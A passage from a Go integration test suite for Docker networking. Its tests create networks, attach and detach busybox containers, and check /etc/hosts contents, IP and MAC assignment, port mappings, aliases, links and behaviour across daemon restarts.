s.d.Cmd("stop", cid1) + + hosts, err := s.d.Cmd("exec", cid1, "cat", hostsFile) + c.Assert(err, checker.IsNil) + + out, err = s.d.Cmd("run", "-d", "--name", "container2", "busybox", "top") + c.Assert(err, check.IsNil) + cid2 := strings.TrimSpace(out) + + // verify first container's etc/hosts file has not changed after spawning the second named container + hostsPost, err := s.d.Cmd("exec", cid1, "cat", hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts), checker.Equals, string(hostsPost), + check.Commentf("Unexpected %s change on second container creation", hostsFile)) + + // stop container 2 and verify first container's etc/hosts has not changed + _, err = s.d.Cmd("stop", cid2) + c.Assert(err, check.IsNil) + + hostsPost, err = s.d.Cmd("exec", cid1, "cat", hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts), checker.Equals, string(hostsPost), + check.Commentf("Unexpected %s change on second container creation", hostsFile)) + + // but discovery is on when connecting to non default bridge network + network := "anotherbridge" + out, err = s.d.Cmd("network", "create", network) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer s.d.Cmd("network", "rm", network) + + out, err = s.d.Cmd("network", "connect", network, cid1) + c.Assert(err, check.IsNil, check.Commentf(out)) + + hosts, err = s.d.Cmd("exec", cid1, "cat", hostsFile) + c.Assert(err, checker.IsNil) + + hostsPost, err = s.d.Cmd("exec", cid1, "cat", hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts), checker.Equals, string(hostsPost), + check.Commentf("Unexpected %s change on second network connection", hostsFile)) +} + +func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) { + testRequires(c, ExecSupport, NotArm) + hostsFile := "/etc/hosts" + cstmBridgeNw := "custom-bridge-nw" + cstmBridgeNw1 := "custom-bridge-nw1" + + dockerCmd(c, "network", "create", "-d", "bridge", cstmBridgeNw) + assertNwIsAvailable(c, cstmBridgeNw) + + // run two anonymous containers and store their etc/hosts content + out, _ := dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top") + cid1 := strings.TrimSpace(out) + + hosts1, err := readContainerFileWithExec(cid1, hostsFile) + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top") + cid2 := strings.TrimSpace(out) + + hosts2, err := readContainerFileWithExec(cid2, hostsFile) + c.Assert(err, checker.IsNil) + + // verify first container etc/hosts file has not changed + hosts1post, err := readContainerFileWithExec(cid1, hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts1), checker.Equals, string(hosts1post), + check.Commentf("Unexpected %s change on anonymous container creation", hostsFile)) + + // Connect the 2nd container to a new network and verify the + // first container /etc/hosts file still hasn't changed. + dockerCmd(c, "network", "create", "-d", "bridge", cstmBridgeNw1) + assertNwIsAvailable(c, cstmBridgeNw1) + + dockerCmd(c, "network", "connect", cstmBridgeNw1, cid2) + + hosts2, err = readContainerFileWithExec(cid2, hostsFile) + c.Assert(err, checker.IsNil) + + hosts1post, err = readContainerFileWithExec(cid1, hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts1), checker.Equals, string(hosts1post), + check.Commentf("Unexpected %s change on container connect", hostsFile)) + + // start a named container + cName := "AnyName" + out, _ = dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "--name", cName, "busybox", "top") + cid3 := strings.TrimSpace(out) + + // verify that container 1 and 2 can ping the named container + dockerCmd(c, "exec", cid1, "ping", "-c", "1", cName) + dockerCmd(c, "exec", cid2, "ping", "-c", "1", cName) + + // Stop named container and verify first two containers' etc/hosts file hasn't changed + dockerCmd(c, "stop", cid3) + hosts1post, err = readContainerFileWithExec(cid1, hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts1), checker.Equals, string(hosts1post), + check.Commentf("Unexpected %s change on name container creation", hostsFile)) + + hosts2post, err := readContainerFileWithExec(cid2, hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts2), checker.Equals, string(hosts2post), + check.Commentf("Unexpected %s change on name container creation", hostsFile)) + + // verify that container 1 and 2 can't ping the named container now + _, _, err = dockerCmdWithError("exec", cid1, "ping", "-c", "1", cName) + c.Assert(err, check.NotNil) + _, _, err = dockerCmdWithError("exec", cid2, "ping", "-c", "1", cName) + c.Assert(err, check.NotNil) +} + +func (s *DockerNetworkSuite) TestDockerNetworkLinkOnDefaultNetworkOnly(c *check.C) { + // Legacy Link feature must work only on default network, and not across networks + cnt1 := "container1" + cnt2 := "container2" + network := "anotherbridge" + + // Run first container on default network + dockerCmd(c, "run", "-d", "--name", cnt1, "busybox", "top") + + // Create another network and run the second container on it + dockerCmd(c, "network", "create", network) + assertNwIsAvailable(c, network) + dockerCmd(c, "run", "-d", "--net", network, "--name", cnt2, "busybox", "top") + + // Try launching a container on default network, linking to the first container. Must succeed + dockerCmd(c, "run", "-d", "--link", fmt.Sprintf("%s:%s", cnt1, cnt1), "busybox", "top") + + // Try launching a container on default network, linking to the second container. Must fail + _, _, err := dockerCmdWithError("run", "-d", "--link", fmt.Sprintf("%s:%s", cnt2, cnt2), "busybox", "top") + c.Assert(err, checker.NotNil) + + // Connect second container to default network. Now a container on default network can link to it + dockerCmd(c, "network", "connect", "bridge", cnt2) + dockerCmd(c, "run", "-d", "--link", fmt.Sprintf("%s:%s", cnt2, cnt2), "busybox", "top") +} + +func (s *DockerNetworkSuite) TestDockerNetworkOverlayPortMapping(c *check.C) { + // Verify exposed ports are present in ps output when running a container on + // a network managed by a driver which does not provide the default gateway + // for the container + nwn := "ov" + ctn := "bb" + port1 := 80 + port2 := 443 + expose1 := fmt.Sprintf("--expose=%d", port1) + expose2 := fmt.Sprintf("--expose=%d", port2) + + dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, nwn) + assertNwIsAvailable(c, nwn) + + dockerCmd(c, "run", "-d", "--net", nwn, "--name", ctn, expose1, expose2, "busybox", "top") + + // Check docker ps o/p for last created container reports the unpublished ports + unpPort1 := fmt.Sprintf("%d/tcp", port1) + unpPort2 := fmt.Sprintf("%d/tcp", port2) + out, _ := dockerCmd(c, "ps", "-n=1") + // Missing unpublished ports in docker ps output + c.Assert(out, checker.Contains, unpPort1) + // Missing unpublished ports in docker ps output + c.Assert(out, checker.Contains, unpPort2) +} + +func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + dnd := "dnd" + did := "did" + + mux := http.NewServeMux() + server := httptest.NewServer(mux) + setupRemoteNetworkDrivers(c, mux, server.URL, dnd, did) + + s.d.StartWithBusybox() + _, err := s.d.Cmd("network", "create", "-d", dnd, "--subnet", "1.1.1.0/24", "net1") + c.Assert(err, checker.IsNil) + + _, err = s.d.Cmd("run", "-itd", "--net", "net1", "--name", "foo", "--ip", "1.1.1.10", "busybox", "sh") + c.Assert(err, checker.IsNil) + + // Kill daemon and restart + if err = s.d.cmd.Process.Kill(); err != nil { + c.Fatal(err) + } + + server.Close() + + startTime := time.Now().Unix() + if err = s.d.Restart(); err != nil { + c.Fatal(err) + } + lapse := time.Now().Unix() - startTime + if lapse > 60 { + // In normal scenarios, daemon restart takes ~1 second. + // Plugin retry mechanism can delay the daemon start. systemd may not like it. + // Avoid accessing plugins during daemon bootup + c.Logf("daemon restart took too long : %d seconds", lapse) + } + + // Restart the custom dummy plugin + mux = http.NewServeMux() + server = httptest.NewServer(mux) + setupRemoteNetworkDrivers(c, mux, server.URL, dnd, did) + + // trying to reuse the same ip must succeed + _, err = s.d.Cmd("run", "-itd", "--net", "net1", "--name", "bar", "--ip", "1.1.1.10", "busybox", "sh") + c.Assert(err, checker.IsNil) +} + +func (s *DockerNetworkSuite) TestDockerNetworkMacInspect(c *check.C) { + // Verify endpoint MAC address is correctly populated in container's network settings + nwn := "ov" + ctn := "bb" + + dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, nwn) + assertNwIsAvailable(c, nwn) + + dockerCmd(c, "run", "-d", "--net", nwn, "--name", ctn, "busybox", "top") + + mac := inspectField(c, ctn, "NetworkSettings.Networks."+nwn+".MacAddress") + c.Assert(mac, checker.Equals, "a0:b1:c2:d3:e4:f5") +} + +func (s *DockerSuite) TestInspectAPIMultipleNetworks(c *check.C) { + dockerCmd(c, "network", "create", "mybridge1") + dockerCmd(c, "network", "create", "mybridge2") + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + dockerCmd(c, "network", "connect", "mybridge1", id) + dockerCmd(c, "network", "connect", "mybridge2", id) + + body := getInspectBody(c, "v1.20", id) + var inspect120 v1p20.ContainerJSON + err := json.Unmarshal(body, &inspect120) + c.Assert(err, checker.IsNil) + + versionedIP := inspect120.NetworkSettings.IPAddress + + body = getInspectBody(c, "v1.21", id) + var inspect121 types.ContainerJSON + err = json.Unmarshal(body, &inspect121) + c.Assert(err, checker.IsNil) + c.Assert(inspect121.NetworkSettings.Networks, checker.HasLen, 3) + + bridge := inspect121.NetworkSettings.Networks["bridge"] + c.Assert(bridge.IPAddress, checker.Equals, versionedIP) + c.Assert(bridge.IPAddress, checker.Equals, inspect121.NetworkSettings.IPAddress) +} + +func connectContainerToNetworks(c *check.C, d *Daemon, cName string, nws []string) { + // Run a container on the default network + out, err := d.Cmd("run", "-d", "--name", cName, "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Attach the container to other networks + for _, nw := range nws { + out, err = d.Cmd("network", "create", nw) + c.Assert(err, checker.IsNil, check.Commentf(out)) + out, err = d.Cmd("network", "connect", nw, cName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + } +} + +func verifyContainerIsConnectedToNetworks(c *check.C, d *Daemon, cName string, nws []string) { + // Verify container is connected to all the networks + for _, nw := range nws { + out, err := d.Cmd("inspect", "-f", fmt.Sprintf("{{.NetworkSettings.Networks.%s}}", nw), cName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Equals), "\n") + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksGracefulDaemonRestart(c *check.C) { + cName := "bb" + nwList := []string{"nw1", "nw2", "nw3"} + + s.d.StartWithBusybox() + + connectContainerToNetworks(c, s.d, cName, nwList) + verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) + + // Reload daemon + s.d.Restart() + + _, err := s.d.Cmd("start", cName) + c.Assert(err, checker.IsNil) + + verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) +} + +func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksUngracefulDaemonRestart(c *check.C) { + cName := "cc" + nwList := []string{"nw1", "nw2", "nw3"} + + s.d.StartWithBusybox() + + connectContainerToNetworks(c, s.d, cName, nwList) + verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) + + // Kill daemon and restart + if err := s.d.cmd.Process.Kill(); err != nil { + c.Fatal(err) + } + s.d.Restart() + + // Restart container + _, err := s.d.Cmd("start", cName) + c.Assert(err, checker.IsNil) + + verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) +} + +func (s *DockerNetworkSuite) TestDockerNetworkRunNetByID(c *check.C) { + out, _ := dockerCmd(c, "network", "create", "one") + containerOut, _, err := dockerCmdWithError("run", "-d", "--net", strings.TrimSpace(out), "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(containerOut)) +} + +func (s *DockerNetworkSuite) TestDockerNetworkHostModeUngracefulDaemonRestart(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + s.d.StartWithBusybox() + + // Run a few containers on host network + for i := 0; i < 10; i++ { + cName := fmt.Sprintf("hostc-%d", i) + out, err := s.d.Cmd("run", "-d", "--name", cName, "--net=host", "--restart=always", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // verfiy container has finished starting before killing daemon + err = s.d.waitRun(cName) + c.Assert(err, checker.IsNil) + } + + // Kill daemon ungracefully and restart + if err := s.d.cmd.Process.Kill(); err != nil { + c.Fatal(err) + } + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + // make sure all the containers are up and running + for i := 0; i < 10; i++ { + err := s.d.waitRun(fmt.Sprintf("hostc-%d", i)) + c.Assert(err, checker.IsNil) + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectToHostFromOtherNetwork(c *check.C) { + dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") + c.Assert(waitRun("container1"), check.IsNil) + dockerCmd(c, "network", "disconnect", "bridge", "container1") + out, _, err := dockerCmdWithError("network", "connect", "host", "container1") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetwork.Error()) +} + +func (s *DockerNetworkSuite) TestDockerNetworkDisconnectFromHost(c *check.C) { + dockerCmd(c, "run", "-d", "--name", "container1", "--net=host", "busybox", "top") + c.Assert(waitRun("container1"), check.IsNil) + out, _, err := dockerCmdWithError("network", "disconnect", "host", "container1") + c.Assert(err, checker.NotNil, check.Commentf("Should err out disconnect from host")) + c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetwork.Error()) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectWithPortMapping(c *check.C) { + testRequires(c, NotArm) + dockerCmd(c, "network", "create", "test1") + dockerCmd(c, "run", "-d", "--name", "c1", "-p", "5000:5000", "busybox", "top") + c.Assert(waitRun("c1"), check.IsNil) + dockerCmd(c, "network", "connect", "test1", "c1") +} + +func verifyPortMap(c *check.C, container, port, originalMapping string, mustBeEqual bool) { + chk := checker.Equals + if !mustBeEqual { + chk = checker.Not(checker.Equals) + } + currentMapping, _ := dockerCmd(c, "port", container, port) + c.Assert(currentMapping, chk, originalMapping) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectWithPortMapping(c *check.C) { + // Connect and disconnect a container with explicit and non-explicit + // host port mapping to/from networks which do cause and do not cause + // the container default gateway to change, and verify docker port cmd + // returns congruent information + testRequires(c, NotArm) + cnt := "c1" + dockerCmd(c, "network", "create", "aaa") + dockerCmd(c, "network", "create", "ccc") + + dockerCmd(c, "run", "-d", "--name", cnt, "-p", "9000:90", "-p", "70", "busybox", "top") + c.Assert(waitRun(cnt), check.IsNil) + curPortMap, _ := dockerCmd(c, "port", cnt, "70") + curExplPortMap, _ := dockerCmd(c, "port", cnt, "90") + + // Connect to a network which causes the container's default gw switch + dockerCmd(c, "network", "connect", "aaa", cnt) + verifyPortMap(c, cnt, "70", curPortMap, false) + verifyPortMap(c, cnt, "90", curExplPortMap, true) + + // Read current mapping + curPortMap, _ = dockerCmd(c, "port", cnt, "70") + + // Disconnect from a network which causes the container's default gw switch + dockerCmd(c, "network", "disconnect", "aaa", cnt) + verifyPortMap(c, cnt, "70", curPortMap, false) + verifyPortMap(c, cnt, "90", curExplPortMap, true) + + // Read current mapping + curPortMap, _ = dockerCmd(c, "port", cnt, "70") + + // Connect to a network which does not cause the container's default gw switch + dockerCmd(c, "network", "connect", "ccc", cnt) + verifyPortMap(c, cnt, "70", curPortMap, true) + verifyPortMap(c, cnt, "90", curExplPortMap, true) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectWithMac(c *check.C) { + macAddress := "02:42:ac:11:00:02" + dockerCmd(c, "network", "create", "mynetwork") + dockerCmd(c, "run", "--name=test", "-d", "--mac-address", macAddress, "busybox", "top") + c.Assert(waitRun("test"), check.IsNil) + mac1 := inspectField(c, "test", "NetworkSettings.Networks.bridge.MacAddress") + c.Assert(strings.TrimSpace(mac1), checker.Equals, macAddress) + dockerCmd(c, "network", "connect", "mynetwork", "test") + mac2 := inspectField(c, "test", "NetworkSettings.Networks.mynetwork.MacAddress") + c.Assert(strings.TrimSpace(mac2), checker.Not(checker.Equals), strings.TrimSpace(mac1)) +} + +func (s *DockerNetworkSuite) TestDockerNetworkInspectCreatedContainer(c *check.C) { + dockerCmd(c, "create", "--name", "test", "busybox") + networks := inspectField(c, "test", "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, "bridge", check.Commentf("Should return 'bridge' network")) +} + +func (s *DockerNetworkSuite) TestDockerNetworkRestartWithMultipleNetworks(c *check.C) { + dockerCmd(c, "network", "create", "test") + dockerCmd(c, "run", "--name=foo", "-d", "busybox", "top") + c.Assert(waitRun("foo"), checker.IsNil) + dockerCmd(c, "network", "connect", "test", "foo") + dockerCmd(c, "restart", "foo") + networks := inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, "bridge", check.Commentf("Should contain 'bridge' network")) + c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContainer(c *check.C) { + dockerCmd(c, "network", "create", "test") + dockerCmd(c, "create", "--name=foo", "busybox", "top") + dockerCmd(c, "network", "connect", "test", "foo") + networks := inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) + + // Restart docker daemon to test the config has persisted to disk + s.d.Restart() + networks = inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) + + // start the container and test if we can ping it from another container in the same network + dockerCmd(c, "start", "foo") + c.Assert(waitRun("foo"), checker.IsNil) + ip := inspectField(c, "foo", "NetworkSettings.Networks.test.IPAddress") + ip = strings.TrimSpace(ip) + dockerCmd(c, "run", "--net=test", "busybox", "sh", "-c", fmt.Sprintf("ping -c 1 %s", ip)) + + dockerCmd(c, "stop", "foo") + + // Test disconnect + dockerCmd(c, "network", "disconnect", "test", "foo") + networks = inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network")) + + // Restart docker daemon to test the config has persisted to disk + s.d.Restart() + networks = inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network")) + +} + +func (s *DockerNetworkSuite) TestDockerNetworkDisconnectContainerNonexistingNetwork(c *check.C) { + dockerCmd(c, "network", "create", "test") + dockerCmd(c, "run", "--net=test", "-d", "--name=foo", "busybox", "top") + networks := inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) + + // Stop container and remove network + dockerCmd(c, "stop", "foo") + dockerCmd(c, "network", "rm", "test") + + // Test disconnecting stopped container from nonexisting network + dockerCmd(c, "network", "disconnect", "-f", "test", "foo") + networks = inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network")) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectPreferredIP(c *check.C) { + // create two networks + dockerCmd(c, "network", "create", "--ipv6", "--subnet=172.28.0.0/16", "--subnet=2001:db8:1234::/64", "n0") + assertNwIsAvailable(c, "n0") + + dockerCmd(c, "network", "create", "--ipv6", "--subnet=172.30.0.0/16", "--ip-range=172.30.5.0/24", "--subnet=2001:db8:abcd::/64", "--ip-range=2001:db8:abcd::/80", "n1") + assertNwIsAvailable(c, "n1") + + // run a container on first network specifying the ip addresses + dockerCmd(c, "run", "-d", "--name", "c0", "--net=n0", "--ip", "172.28.99.88", "--ip6", "2001:db8:1234::9988", "busybox", "top") + c.Assert(waitRun("c0"), check.IsNil) + verifyIPAddressConfig(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988") + verifyIPAddresses(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988") + + // connect the container to the second network specifying an ip addresses + dockerCmd(c, "network", "connect", "--ip", "172.30.55.44", "--ip6", "2001:db8:abcd::5544", "n1", "c0") + verifyIPAddressConfig(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544") + verifyIPAddresses(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544") + + // Stop and restart the container + dockerCmd(c, "stop", "c0") + dockerCmd(c, "start", "c0") + + // verify requested addresses are applied and configs are still there + verifyIPAddressConfig(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988") + verifyIPAddresses(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988") + verifyIPAddressConfig(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544") + verifyIPAddresses(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544") + + // Still it should fail to connect to the default network with a specified IP (whatever ip) + out, _, err := dockerCmdWithError("network", "connect", "--ip", "172.21.55.44", "bridge", "c0") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndIP.Error()) + +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectPreferredIPStoppedContainer(c *check.C) { + // create a container + dockerCmd(c, "create", "--name", "c0", "busybox", "top") + + // create a network + dockerCmd(c, "network", "create", "--ipv6", "--subnet=172.30.0.0/16", "--subnet=2001:db8:abcd::/64", "n0") + assertNwIsAvailable(c, "n0") + + // connect the container to the network specifying an ip addresses + dockerCmd(c, "network", "connect", "--ip", "172.30.55.44", "--ip6", "2001:db8:abcd::5544", "n0", "c0") + verifyIPAddressConfig(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544") + + // start the container, verify config has not changed and ip addresses are assigned + dockerCmd(c, "start", "c0") + c.Assert(waitRun("c0"), check.IsNil) + verifyIPAddressConfig(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544") + verifyIPAddresses(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544") + + // stop the container and check ip config has not changed + dockerCmd(c, "stop", "c0") + verifyIPAddressConfig(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544") +} + +func (s *DockerNetworkSuite) TestDockerNetworkUnsupportedRequiredIP(c *check.C) { + // requested IP is not supported on predefined networks + for _, mode := range []string{"none", "host", "bridge", "default"} { + checkUnsupportedNetworkAndIP(c, mode) + } + + // requested IP is not supported on networks with no user defined subnets + dockerCmd(c, "network", "create", "n0") + assertNwIsAvailable(c, "n0") + + out, _, err := dockerCmdWithError("run", "-d", "--ip", "172.28.99.88", "--net", "n0", "busybox", "top") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkNoSubnetAndIP.Error()) + + out, _, err = dockerCmdWithError("run", "-d", "--ip6", "2001:db8:1234::9988", "--net", "n0", "busybox", "top") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkNoSubnetAndIP.Error()) + + dockerCmd(c, "network", "rm", "n0") + assertNwNotAvailable(c, "n0") +} + +func checkUnsupportedNetworkAndIP(c *check.C, nwMode string) { + out, _, err := dockerCmdWithError("run", "-d", "--net", nwMode, "--ip", "172.28.99.88", "--ip6", "2001:db8:1234::9988", "busybox", "top") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndIP.Error()) +} + +func verifyIPAddressConfig(c *check.C, cName, nwname, ipv4, ipv6 string) { + if ipv4 != "" { + out := inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.IPAMConfig.IPv4Address", nwname)) + c.Assert(strings.TrimSpace(out), check.Equals, ipv4) + } + + if ipv6 != "" { + out := inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.IPAMConfig.IPv6Address", nwname)) + c.Assert(strings.TrimSpace(out), check.Equals, ipv6) + } +} + +func verifyIPAddresses(c *check.C, cName, nwname, ipv4, ipv6 string) { + out := inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.IPAddress", nwname)) + c.Assert(strings.TrimSpace(out), check.Equals, ipv4) + + out = inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.GlobalIPv6Address", nwname)) + c.Assert(strings.TrimSpace(out), check.Equals, ipv6) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectLinkLocalIP(c *check.C) { + // create one test network + dockerCmd(c, "network", "create", "n0") + assertNwIsAvailable(c, "n0") + + // run a container with incorrect link-local address + _, _, err := dockerCmdWithError("run", "--link-local-ip", "169.253.5.5", "busybox", "top") + c.Assert(err, check.NotNil) + _, _, err = dockerCmdWithError("run", "--link-local-ip", "2001:db8::89", "busybox", "top") + c.Assert(err, check.NotNil) + + // run two containers with link-local ip on the test network + dockerCmd(c, "run", "-d", "--name", "c0", "--net=n0", "--link-local-ip", "169.254.7.7", "--link-local-ip", "fe80::254:77", "busybox", "top") + c.Assert(waitRun("c0"), check.IsNil) + dockerCmd(c, "run", "-d", "--name", "c1", "--net=n0", "--link-local-ip", "169.254.8.8", "--link-local-ip", "fe80::254:88", "busybox", "top") + c.Assert(waitRun("c1"), check.IsNil) + + // run a container on the default network and connect it to the test network specifying a link-local address + dockerCmd(c, "run", "-d", "--name", "c2", "busybox", "top") + c.Assert(waitRun("c2"), check.IsNil) + dockerCmd(c, "network", "connect", "--link-local-ip", "169.254.9.9", "n0", "c2") + + // verify the three containers can ping each other via the link-local addresses + _, _, err = dockerCmdWithError("exec", "c0", "ping", "-c", "1", "169.254.8.8") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "c1", "ping", "-c", "1", "169.254.9.9") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "c2", "ping", "-c", "1", "169.254.7.7") + c.Assert(err, check.IsNil) + + // Stop and restart the three containers + dockerCmd(c, "stop", "c0") + dockerCmd(c, "stop", "c1") + dockerCmd(c, "stop", "c2") + dockerCmd(c, "start", "c0") + dockerCmd(c, "start", "c1") + dockerCmd(c, "start", "c2") + + // verify the ping again + _, _, err = dockerCmdWithError("exec", "c0", "ping", "-c", "1", "169.254.8.8") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "c1", "ping", "-c", "1", "169.254.9.9") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "c2", "ping", "-c", "1", "169.254.7.7") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectLink(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "foo1") + dockerCmd(c, "network", "create", "-d", "bridge", "foo2") + + dockerCmd(c, "run", "-d", "--net=foo1", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + // run a container in a user-defined network with a link for an existing container + // and a link for a container that doesn't exist + dockerCmd(c, "run", "-d", "--net=foo1", "--name=second", "--link=first:FirstInFoo1", + "--link=third:bar", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // ping to first and its alias FirstInFoo1 must succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo1") + c.Assert(err, check.IsNil) + + // connect first container to foo2 network + dockerCmd(c, "network", "connect", "foo2", "first") + // connect second container to foo2 network with a different alias for first container + dockerCmd(c, "network", "connect", "--link=first:FirstInFoo2", "foo2", "second") + + // ping the new alias in network foo2 + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo2") + c.Assert(err, check.IsNil) + + // disconnect first container from foo1 network + dockerCmd(c, "network", "disconnect", "foo1", "first") + + // link in foo1 network must fail + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo1") + c.Assert(err, check.NotNil) + + // link in foo2 network must succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo2") + c.Assert(err, check.IsNil) +} + +func (s *DockerNetworkSuite) TestDockerNetworkDisconnectDefault(c *check.C) { + netWorkName1 := "test1" + netWorkName2 := "test2" + containerName := "foo" + + dockerCmd(c, "network", "create", netWorkName1) + dockerCmd(c, "network", "create", netWorkName2) + dockerCmd(c, "create", "--name", containerName, "busybox", "top") + dockerCmd(c, "network", "connect", netWorkName1, containerName) + dockerCmd(c, "network", "connect", netWorkName2, containerName) + dockerCmd(c, "network", "disconnect", "bridge", containerName) + + dockerCmd(c, "start", containerName) + c.Assert(waitRun(containerName), checker.IsNil) + networks := inspectField(c, containerName, "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, netWorkName1, check.Commentf(fmt.Sprintf("Should contain '%s' network", netWorkName1))) + c.Assert(networks, checker.Contains, netWorkName2, check.Commentf(fmt.Sprintf("Should contain '%s' network", netWorkName2))) + c.Assert(networks, checker.Not(checker.Contains), "bridge", check.Commentf("Should not contain 'bridge' network")) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectWithAliasOnDefaultNetworks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + + defaults := []string{"bridge", "host", "none"} + out, _ := dockerCmd(c, "run", "-d", "--net=none", "busybox", "top") + containerID := strings.TrimSpace(out) + for _, net := range defaults { + res, _, err := dockerCmdWithError("network", "connect", "--alias", "alias"+net, net, containerID) + c.Assert(err, checker.NotNil) + c.Assert(res, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error()) + } +} + +func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectAlias(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "net1") + dockerCmd(c, "network", "create", "-d", "bridge", "net2") + + cid, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // ping 